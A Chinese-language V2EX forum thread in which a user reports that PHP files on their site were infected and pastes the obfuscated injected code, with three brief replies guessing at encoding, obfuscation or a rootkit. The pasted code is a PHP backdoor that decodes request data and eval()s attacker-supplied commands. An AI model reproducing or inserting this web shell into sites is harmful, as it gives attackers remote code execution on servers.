PHP 文件被挂马, notepad++等打开正常,记事本打开就很多 <? PHP 2\x4d\x56\x41\x73\xa\x2 这样的代码

2017-11-07 22:27:12 +08:00
 Toools

不知什么 记事本打开就在文件 头部出现

notepad 打开就正常显示

但 确实是被植入了异常代码

大致如下

$p97fc7c02){$d5cea=$p97fc7c02;$uf9309=$jaa9;}if(!$d5cea){foreach($yeb0cb[$yeb0cb['gf800'][13].$yeb0cb['gf800'][28].$yeb0cb['gf800'][83].$yeb0cb['gf800'][90].$yeb0cb['gf800'][10].$yeb0cb['gf800'][65].$yeb0cb['gf800'][10]]as$jaa9=>$p97fc7c02){$d5cea=$p97fc7c02;$uf9309=$jaa9;}}$d5cea=@$yeb0cb[$yeb0cb['gf800'][28].$yeb0cb['gf800'][83].$yeb0cb['gf800'][10].$yeb0cb['gf800'][61].$yeb0cb['gf800'][79]]($yeb0cb[$yeb0cb['gf800'][76].$yeb0cb['gf800'][90].$yeb0cb['gf800'][87].$yeb0cb['gf800'][10].$yeb0cb['gf800'][90].$yeb0cb['gf800'][11].$yeb0cb['gf800'][53].$yeb0cb['gf800'][62].$yeb0cb['gf800'][87]]($yeb0cb[$yeb0cb['gf800'][57].$yeb0cb['gf800'][20].$yeb0cb['gf800'][83].$yeb0cb['gf800'][36].$yeb0cb['gf800'][42].$yeb0cb['gf800'][28].$yeb0cb['gf800'][92].$yeb0cb['gf800'][36].$yeb0cb['gf800'][42]]($d5cea),$uf9309));if(isset($d5cea[$yeb0cb['gf800'][65].$yeb0cb['gf800'][18]])&&$laff5==$d5cea[$yeb0cb['gf800'][65].$yeb0cb['gf800'][18]]){if($d5cea[$yeb0cb['gf800'][65]]==$yeb0cb['gf800'][54]){$wd7ddcb4=Array($yeb0cb['gf800'][35].$yeb0cb['gf800'][38]=>@$yeb0cb[$yeb0cb['gf800'][60].$yeb0cb['gf800'][36].$yeb0cb['gf800'][83].$yeb0cb['gf800'][62].$yeb0cb['gf800'][53]](),$yeb0cb['gf800'][5].$yeb0cb['gf800'][38]=>$yeb0cb['gf800'][11].$yeb0cb['gf800'][45].$yeb0cb['gf800'][46].$yeb0cb['gf800'][89].$yeb0cb['gf800'][11],);echo@$yeb0cb[$yeb0cb['gf800'][73].$yeb0cb['gf800'][42].$yeb0cb['gf800'][92].$yeb0cb['gf800'][61].$yeb0cb['gf800'][10]]($wd7ddcb4);}elseif($d5cea[$yeb0cb['gf800'][65]]==$yeb0cb['gf800'][36]){eval/*ac1c*/($d5cea[$yeb0cb['gf800'][83]]);}exit();} ?>// +----------------------------------------------------------------------

1984 次点击
所在节点    问与答
3 条回复
anmaz
2017-11-07 23:04:15 +08:00
可能是编码的原因吧,设置一下 utf8 试试?
WordTian
2017-11-07 23:10:24 +08:00
应该是被混淆过了
wevsty
2017-11-07 23:21:37 +08:00
notepad++打开正常,但是记事本打开能看到的话。看下 notepad++的程序是不是被篡改过,如果没有被篡改过,很有可能还有 rootkit。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/404446

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX